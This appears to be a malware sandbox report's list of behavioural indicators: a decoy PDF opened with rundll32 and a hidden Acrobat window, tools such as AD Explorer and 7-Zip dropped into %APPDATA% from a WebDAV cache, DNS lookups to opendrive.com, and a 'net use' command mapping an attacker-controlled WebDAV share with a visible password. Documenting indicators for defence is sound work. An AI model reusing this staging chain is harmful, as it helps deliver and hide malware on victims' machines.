Technical Information
- '<SYSTEM32>\rundll32.exe' url.dll,FileProtocolHandler %APPDATA%\tmp.pdf
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%APPDATA%\tmp.pdf"
- %WINDIR%\serviceprofiles\localservice\appdata\roaming\microsoft\windows\ietldcache\index.dat
- nul
- %WINDIR%\ServiceProfiles\LocalService\appdata\local\temp\tfsstore\tfs_dav\tmp0.pdf
- %APPDATA%\tmp.pdf
- %WINDIR%\ServiceProfiles\LocalService\appdata\local\temp\tfsstore\tfs_dav\adexplorer0.exe
- %APPDATA%\adexplorer.exe
- %WINDIR%\ServiceProfiles\LocalService\appdata\local\temp\tfsstore\tfs_dav\7z0.exe
- %APPDATA%\7z.exe
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK we####.opendrive.com
- DNS ASK microsoft.com
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%APPDATA%\tmp.pdf"' (with hidden window)
- '<SYSTEM32>\net.exe' use https://webdav.opendrive.com 2E5IJcgd38d /user:bamar84510@mailerv.net